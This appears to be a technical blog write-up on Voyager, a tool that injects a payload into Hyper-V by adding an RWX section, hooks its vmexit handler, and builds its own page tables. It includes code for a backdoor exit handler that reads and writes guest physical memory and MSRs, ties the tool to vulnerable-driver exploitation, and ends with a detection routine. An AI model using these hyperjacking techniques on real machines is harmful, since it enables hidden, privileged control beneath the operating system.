For demonstration purposes, this paragraph refers entirely to Windows 10 20H2 hvax64.exe. The switch is easy to locate inside the exit handler. Tracing "exit_reason" back to where it is set gives us our first offset into a structure. Searching for all occurrences of this offset as an immediate value in IDA Pro yields many results. One of these results derives a pointer to a structure that contains the VMCB's virtual address:

```asm
.text:FFFFF8000025B441 65 48 8B 04 25 A0 03 01 00 mov rax, gs:103A0h
.text:FFFFF8000025B44A 48 8B 88 98 02 00 00 mov rcx, [rax+298h]
.text:FFFFF8000025B451 48 8B 81 80 0E 00 00 mov rax, [rcx+0E80h]
```

sig: 65 48 8B 04 25 ? ? ? ? 48 8B 88 ? ? ? ? 48 8B 81 ? ? ? ? 48 8B 88
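The three wildcarded displacements in this signature (0x103A0, 0x298 and 0xE80 in 20H2) appear to correspond to voyager_t's offset_vmcb_base, offset_vmcb_link and offset_vmcb fields, though the post does not spell out that mapping. The sketch below extracts them from a signature match and then follows the same three loads the instructions perform, starting from the GS base. Whether the final value is the VMCB itself or a structure holding its address should be confirmed in IDA. All helper names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

typedef struct {
    uint32_t gs_offset;   /* mov rax, gs:[disp32]   (0x103A0 in 20H2) */
    uint32_t link_offset; /* mov rcx, [rax+disp32]  (0x298) */
    uint32_t vmcb_offset; /* mov rax, [rcx+disp32]  (0xE80) */
} vmcb_offsets_t;

static uint32_t read_u32(const uint8_t *p)
{
    uint32_t v;
    memcpy(&v, p, sizeof(v)); /* little-endian disp32, unaligned-safe */
    return v;
}

/* match points at the first byte of the signature. */
static vmcb_offsets_t parse_vmcb_offsets(const uint8_t *match)
{
    vmcb_offsets_t o;
    o.gs_offset   = read_u32(match + 5);
    o.link_offset = read_u32(match + 12);
    o.vmcb_offset = read_u32(match + 19);
    return o;
}

/* Perform the same three qword loads as the instructions above. */
static uint64_t walk_gs_chain(uint64_t gs_base, const vmcb_offsets_t *o)
{
    uint64_t rax = *(const uint64_t *)(uintptr_t)(gs_base + o->gs_offset);
    uint64_t rcx = *(const uint64_t *)(uintptr_t)(rax + o->link_offset);
    return *(const uint64_t *)(uintptr_t)(rcx + o->vmcb_offset);
}
```

Scanning for the signature and parsing the displacements at injection time, rather than hard-coding them, is presumably what lets the same payload work across Hyper-V builds whose per-processor structures differ.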

Hyper-V Payload - Injection, vmexit handler hooking



Once the address of the vmexit handler is located and, for AMD, the VMCB offsets are acquired, the only thing left is to inject the payload under Hyper-V. Voyager does this by inserting an additional section header into Hyper-V's PE header. The section is named ".payload" and its memory is marked RWX. The payload's sections are then mapped into this memory and its relocations are applied.

An exported structure in the payload is filled in with the corresponding information:

```c
typedef struct _voyager_t
{
    u64 vmexit_handler_rva;
    u64 hyperv_module_base;
    u64 hyperv_module_size;
    u64 payload_base;
    u64 payload_size;

    // only used by AMD payload...
    u64 offset_vmcb_base;
    u64 offset_vmcb_link;
    u64 offset_vmcb;
} voyager_t, *pvoyager_t;
```

Once the payload is mapped into memory, the relative call to the C vmexit handler inside the exit stub is patched so that it calls the payload's vmexit handler instead. After the payload's vmexit handler runs, the original vmexit handler is called, so the author of a Voyager payload can simply pass through any #VMEXIT they do not want to handle.
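A minimal sketch of that pass-through pattern follows. It assumes the payload handler has exactly the signature of the handler it replaces (so the patched CALL can reach it unchanged) and that the original handler's address is already known, for example from the old CALL target. The context structure, the key value and the CPUID-based trigger are hypothetical and only illustrate the idea. A real handler that consumes an exit must also advance the guest RIP past the exiting instruction.

```c
#include <stdint.h>

typedef uint64_t u64;

/* Hypothetical view of what the handler receives. */
typedef struct {
    u64 exit_reason;
    u64 rax, rcx;
} exit_ctx_t;

typedef u64 (*vmexit_handler_t)(exit_ctx_t *ctx);

#define EXIT_REASON_CPUID 10ull    /* VMX basic exit reason for CPUID */
#define PAYLOAD_KEY 0xC0FFEEull    /* hypothetical guest-to-payload marker */

/* Hyper-V's original C handler, e.g. the old CALL target saved at patch time. */
static vmexit_handler_t original_vmexit_handler;

/* Same signature as the handler it replaces. */
static u64 payload_vmexit_handler(exit_ctx_t *ctx)
{
    if (ctx->exit_reason == EXIT_REASON_CPUID && ctx->rcx == PAYLOAD_KEY) {
        ctx->rax = 1; /* handled by the payload; guest RIP must also be advanced */
        return 0;
    }
    /* Not ours: let Hyper-V handle the exit as if nothing was hooked. */
    return original_vmexit_handler(ctx);
}
```

Forwarding by default keeps Hyper-V's behaviour identical for every exit the payload does not explicitly claim, which is what makes the hook transparent to the guest.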

Hyper-V Page Tables - Extended Page Tables, Host Page Tables

Each logical processor virtualized by Hyper-V has its own unique host CR3 value and thus its own PML4. For the payload to manipulate guest physical memory, or memory in general, it needs access to the host page tables. This is a problem, however, because page tables live in physical memory and are not necessarily mapped into the host's virtual address space. To manipulate one's own page tables, a self-referencing PML4E is required: a PML4E that points back at the PML4 itself maps all page tables of the current address space into virtual memory with a single entry.



Luckily for me, Hyper-V, as expected, has a self-referencing PML4E in all of its host PML4s. The index of this PML4E is 510, which means the virtual address of every host PML4 is 0xFFFFFF7FBFDFE000. This PML4E can be located using VMware's GDB stub and IDA Pro. By placing an infinite loop in the vmexit handler hook, we can break into the hypervisor's address space with IDA. We can then read CR3 to obtain the physical address of the PML4, switch IDA's memory view to physical addresses, go to the PML4, and inspect it manually.
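The address 0xFFFFFF7FBFDFE000 follows directly from the index. With PML4E 510 pointing back at the PML4, a virtual address whose four table indices are all 510 walks the self-reference four times and lands on the PML4 page itself; the result is then sign-extended from bit 47 to make it canonical. The sketch below computes that, along with the address of the PTE that maps an arbitrary virtual address through the same entry. The helper names are hypothetical.

```c
#include <stdint.h>

/* Sign-extend bit 47 to produce a canonical 48-bit virtual address. */
static uint64_t canonical(uint64_t va)
{
    return (va & (1ull << 47)) ? (va | 0xFFFF000000000000ull) : va;
}

/* Virtual address of the PML4 itself when PML4E[self] points back at it. */
static uint64_t self_ref_pml4_va(uint64_t self)
{
    return canonical((self << 39) | (self << 30) | (self << 21) | (self << 12));
}

/* Virtual address of the 8-byte PTE that maps va, walking the self-reference
 * once: [self, pml4(va), pdpt(va), pd(va)] with byte offset pt(va) * 8. */
static uint64_t self_ref_pte_va(uint64_t self, uint64_t va)
{
    uint64_t base = canonical(self << 39);
    return base + (((va & 0x0000FFFFFFFFFFFFull) >> 12) << 3);
}
```

With index 510, self_ref_pml4_va returns 0xFFFFFF7FBFDFE000, matching the constant found in hvix64.exe and hvax64.exe, and the PTE region for the whole address space starts at 0xFFFFFF0000000000.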

I made a very small Python script that scans the current logical processor's PML4. It checks every PML4E to see whether its PFN is the physical address of the PML4 itself. Once found, it returns the index, which is used to build the linear virtual address of the current PML4. If you open hvax64.exe or hvix64.exe in IDA and search for the immediate value 0xFFFFFF7FBFDFE000, you will see a handful of results.

```python
from idaapi import *
from idc import read_dbg_qword

def splice(result, start_token, end_token):
    # the debugger command output is the second element of the result
    output = result[1]
    start_pos = output.find(start_token)
    end_pos = output.rfind(end_token)
    if start_pos == -1 or end_pos == -1:
        return None
    start_pos += len(start_token)
    if start_pos > end_pos:
        return None
    return output[start_pos:end_pos]

def find_self_ref(pml4):
    # a PML4E is self-referencing if its PFN (bits 12-47) is the PML4 itself
    for i in range(512):
        pml4e = read_dbg_qword(pml4 + (i * 8))
        if (pml4e & 0xFFFFFFFFF000) == pml4:
            return i
    return None

def main():
    read_cr3 = send_dbg_command("r cr3")
    # drop the low 12 bits (flags or PCID) so only the PML4 address remains
    pml4 = int(splice(read_cr3, "cr3=", "\n"), 16) & 0xFFFFFFFFF000
    print("pml4 = {0}, self ref index = {1}".format(hex(pml4), find_self_ref(pml4)))

main()
```

Note that this self-referencing PML4E index is constant across all Hyper-V builds; the linear virtual address of the host PML4 is essentially hard-coded into every Hyper-V binary.



Payload - Page Tables

Now that the self-referencing PML4E, and with it the PML4's virtual address, has been discovered, host virtual memory can be accessed and configured. Both the AMD and Intel Hyper-V payloads insert an additional PML4E into the host PML4 that points to a set of page tables embedded inside the payload. These page tables live in sections named ".pdpt", ".pd", and ".pt" respectively. Each logical processor is allotted two PTEs, which it uses to map a source page and a destination page. This allows memory to be copied directly between the two pages rather than through an intermediate buffer.
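The post does not give the exact layout, so the following is only a sketch under stated assumptions: the payload's PML4E sits at a hypothetical index (70 here), its PDPT and PD use entry 0, and logical processor n owns PT entries 2n (source) and 2n + 1 (destination). Under those assumptions each core finds its two windows at fixed virtual addresses and only has to rewrite its own PTEs (and flush the stale TLB entries, for example with invlpg) before copying. The helper names are hypothetical.

```c
#include <stdint.h>

#define PAYLOAD_PML4_INDEX 70ull /* hypothetical PML4 slot used by the payload */

enum map_kind { MAP_SOURCE = 0, MAP_DEST = 1 };

static uint64_t canonical_va(uint64_t va)
{
    return (va & (1ull << 47)) ? (va | 0xFFFF000000000000ull) : va;
}

/* Virtual address through which logical processor `core` sees the byte at
 * phys once its source/destination PTE maps the page containing phys,
 * assuming PML4E -> PDPT[0] -> PD[0] -> PT with entries 2*core and 2*core+1. */
static uint64_t mapping_va(unsigned core, enum map_kind kind, uint64_t phys)
{
    uint64_t pt_index = 2ull * core + (uint64_t)kind;
    return canonical_va(PAYLOAD_PML4_INDEX << 39) + (pt_index << 12) + (phys & 0xFFF);
}

/* 4 KB PTE mapping the page containing phys as present (bit 0) and writable (bit 1). */
static uint64_t make_pte(uint64_t phys)
{
    return (phys & 0x000FFFFFFFFFF000ull) | 0x3ull;
}
```

With this layout one 512-entry PT gives two windows each to 256 logical processors, and a single copy through the windows must not cross a 4 KB page boundary, so larger copies are split page by page.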

Voyager - VDM Support & Legacy Projects

VDM (Vulnerable Driver Manipulation) is a namespace that encompasses techniques for exploiting vulnerable drivers; the framework has been inherited by several other projects, such as the PTM (Page Table Manipulation) framework. For the sake of code reuse, VDM can be configured so that a vulnerable driver does not need to be loaded for the underlying code to work. In this section of the post, I will discuss how Voyager and the VDM namespace can be integrated.

VDM - Vulnerable Driver Manipulation

The initial VDM project under the VDM namespace is a framework intended to systematically exploit vulnerable Windows drivers that expose arbitrary physical memory read and write. The framework provides an easy, templated, syscall-like interface for calling any routine in the kernel. The second project under the VDM namespace, MSREXEC, systematically exploits vulnerable Windows drivers that expose an arbitrary MSR write: it temporarily overwrites the LSTAR MSR and uses ROP to disable SMEP.

Neither project works under Hyper-V, since patching ntoskrnl is not possible and writing to LSTAR is not possible either. With Voyager, however, not only can both projects work under Hyper-V, but their requirements can be fulfilled by a payload injected into Hyper-V rather than by a vulnerable driver.

```cpp
switch (exit_reason)
{
case vmexit_command_t::read_guest_phys:
{
    auto command_data =
        vmexit::get_command(guest_registers->r8);

    u64 guest_dirbase;
    __vmx_vmread(VMCS_GUEST_CR3, &guest_dirbase);

    // from 1809-1909 PCIDE is enabled in CR4, so the low 12 bits of cr3 hold a PCID...
    guest_dirbase = cr3{ guest_dirbase }.pml4_pfn << 12;

    guest_registers->rax =
        (u64)mm::read_guest_phys(
            guest_dirbase,
            command_data.copy_phys.phys_addr,
            command_data.copy_phys.buffer,
            command_data.copy_phys.size);

    vmexit::set_command(
        guest_registers->r8, command_data);
    break;
}
case vmexit_command_t::write_guest_phys:
{
    auto command_data =
        vmexit::get_command(guest_registers->r8);

    u64 guest_dirbase;
    __vmx_vmread(VMCS_GUEST_CR3, &guest_dirbase);

    // from 1809-1909 PCIDE is enabled in CR4, so the low 12 bits of cr3 hold a PCID...
    guest_dirbase = cr3{ guest_dirbase }.pml4_pfn << 12;

    guest_registers->rax =
        (u64)mm::write_guest_phys(
            guest_dirbase,
            command_data.copy_phys.phys_addr,
            command_data.copy_phys.buffer,
            command_data.copy_phys.size);

    vmexit::set_command(
        guest_registers->r8, command_data);
    break;
}
case vmexit_command_t::write_msr:
{
    auto command_data =
        vmexit::get_command(guest_registers->r8);

    __writemsr(command_data.write_msr.reg,
        command_data.write_msr.value);
    break;
}
default:
    break;
}
```
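The PCIDE comment in the handler refers to the low bits of CR3: when CR4.PCIDE is set, bits 11:0 hold the PCID, so the PML4 base has to be taken from bits 51:12, which is what the handler's cr3 bitfield does via pml4_pfn. A sketch of that masking, plus the index split that a four-level walk of the guest tables relies on (helpers like mm::read_guest_phys presumably need such a walk to translate the guest buffer address), follows. The helper names are hypothetical.

```c
#include <stdint.h>

/* PML4 physical base from a CR3 value (bits 51:12), whether or not
 * CR4.PCIDE is set; bit 63 and bits 11:0 are discarded. */
static uint64_t cr3_pml4_base(uint64_t cr3)
{
    return cr3 & 0x000FFFFFFFFFF000ull;
}

/* With CR4.PCIDE set, bits 11:0 of CR3 are the PCID. */
static uint16_t cr3_pcid(uint64_t cr3)
{
    return (uint16_t)(cr3 & 0xFFF);
}

/* Table indices and page offset of a virtual address for 4 KB pages. */
typedef struct { unsigned pml4, pdpt, pd, pt, offset; } va_parts_t;

static va_parts_t split_va(uint64_t va)
{
    va_parts_t p;
    p.pml4   = (unsigned)((va >> 39) & 0x1FF);
    p.pdpt   = (unsigned)((va >> 30) & 0x1FF);
    p.pd     = (unsigned)((va >> 21) & 0x1FF);
    p.pt     = (unsigned)((va >> 12) & 0x1FF);
    p.offset = (unsigned)(va & 0xFFF);
    return p;
}
```

As a cross-check, splitting 0xFFFFFF7FBFDFE123 yields index 510 at all four levels and offset 0x123, consistent with the self-referencing PML4 address discussed earlier.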

Possible Detection - UEFI Reclaimable Memory

Although both the payload and Hyper-V are protected by second-level address translation, multiple copies of the hypervisor and the payload remain in physical memory. This is a consequence of the PE loader. First, an allocation is made with the size of the entire PE file on disk. Then another allocation is made with the size given by the optional header's "SizeOfImage" field. Sections are mapped into the newer allocation and page protections are applied. The original allocation containing the on-disk file is then freed. However, freeing an allocation does not mean that the module's physical memory is zeroed or altered in any way. Besides the on-disk-sized allocation, Hyper-V also appears to be reallocated entirely in physical memory.

Since the old, pre-reallocation view of Hyper-V with all sections mapped is still in physical memory, one could scan the first 1 GB of physical memory for the Hyper-V PE header. If this PE header contains a ".payload" section, Voyager is likely at play. Even if the allocation containing Hyper-V were not physically contiguous (in all of my tests it always was), the DOS header and NT headers, including the section headers, all fit within a single 4 KB page. In other words, physical contiguity does not matter for this very simple detection.

```c
BOOLEAN DetectHyperVTampering()
{
    SIZE_T CopiedBytes;
    PHYSICAL_ADDRESS Pa;
    MM_COPY_ADDRESS Ca;
    NTSTATUS Result;
    IMAGE_DOS_HEADER ImageHeader;
    IMAGE_NT_HEADERS64 ImageNtHeader;
    IMAGE_SECTION_HEADER SectionHeader;

    DbgPrint("> Scanning Physical Memory... Please Wait...\n");

    // loop over physical memory in 2mb-1gb...
    // This range is arbitrary, and only created from my vm...
    for (ULONG Page = PAGE_2MB; Page < PAGE_1GB; Page += PAGE_4KB)
    {
        Pa.QuadPart = Page;
        Ca.PhysicalAddress = Pa;

        if (!NT_SUCCESS((Result = MmCopyMemory(&ImageHeader, Ca,
            sizeof(IMAGE_DOS_HEADER),
            MM_COPY_MEMORY_PHYSICAL, &CopiedBytes))))
            continue;

        // e_lfanew must point inside this 4KB page
        if (ImageHeader.e_magic != IMAGE_DOS_SIGNATURE ||
            ImageHeader.e_lfanew < 0 || ImageHeader.e_lfanew > PAGE_4KB)
            continue;

        Pa.QuadPart += ImageHeader.e_lfanew;
        Ca.PhysicalAddress = Pa;

        if (!NT_SUCCESS((Result = MmCopyMemory(&ImageNtHeader, Ca,
            sizeof(IMAGE_NT_HEADERS64),
            MM_COPY_MEMORY_PHYSICAL, &CopiedBytes))))
            continue;

        if (ImageNtHeader.Signature != IMAGE_NT_SIGNATURE)
            continue;

        // if we find a PE header, check to see if its HVIX or HVAX....
        if (ImageNtHeader.OptionalHeader.ImageBase == 0xFFFFF80000000000)
        {
            DbgPrint("> Found A Hyper-V PE Header...\n");

            // the section table starts right after the optional header
            LONGLONG SectionTable = Pa.QuadPart +
                FIELD_OFFSET(IMAGE_NT_HEADERS64, OptionalHeader) +
                ImageNtHeader.FileHeader.SizeOfOptionalHeader;

            ULONG SectionCount = ImageNtHeader.FileHeader.NumberOfSections;
            for (ULONG Idx = 0u; Idx < SectionCount; ++Idx)
            {
                Ca.PhysicalAddress.QuadPart =
                    SectionTable + (LONGLONG)(Idx * sizeof(IMAGE_SECTION_HEADER));

                if (!NT_SUCCESS((Result = MmCopyMemory(&SectionHeader, Ca,
                    sizeof(IMAGE_SECTION_HEADER),
                    MM_COPY_MEMORY_PHYSICAL, &CopiedBytes))))
                    continue;

                // Name is not NUL-terminated when it is 8 chars long (".payload" is)
                if (!strncmp((PCHAR)SectionHeader.Name, ".payload", IMAGE_SIZEOF_SHORT_NAME))
                {
                    DbgPrint("> Voyager Detected....\n");
                    return TRUE;
                }

                if (!strncmp((PCHAR)SectionHeader.Name, ".rsrc", IMAGE_SIZEOF_SHORT_NAME) &&
                    SectionHeader.Characteristics == SECTION_PERM) // RWX
                {
                    DbgPrint("> Cr4sh Backdoor Detected...\n");
                    return TRUE;
                }
            }
        }
    }

    DbgPrint("> Finished Scanning...\n");
    return FALSE;
}
```

Conclusion

Hyper-V is ideal for hyperjacking because it carries a sense of legitimacy and importance: it is used on HVCI systems, and for this reason a payload injected into it carries the same legitimacy. Although this project does not support Secure Boot or legacy BIOS, it was a good starting project for me, as I had never done any UEFI or hypervisor work before.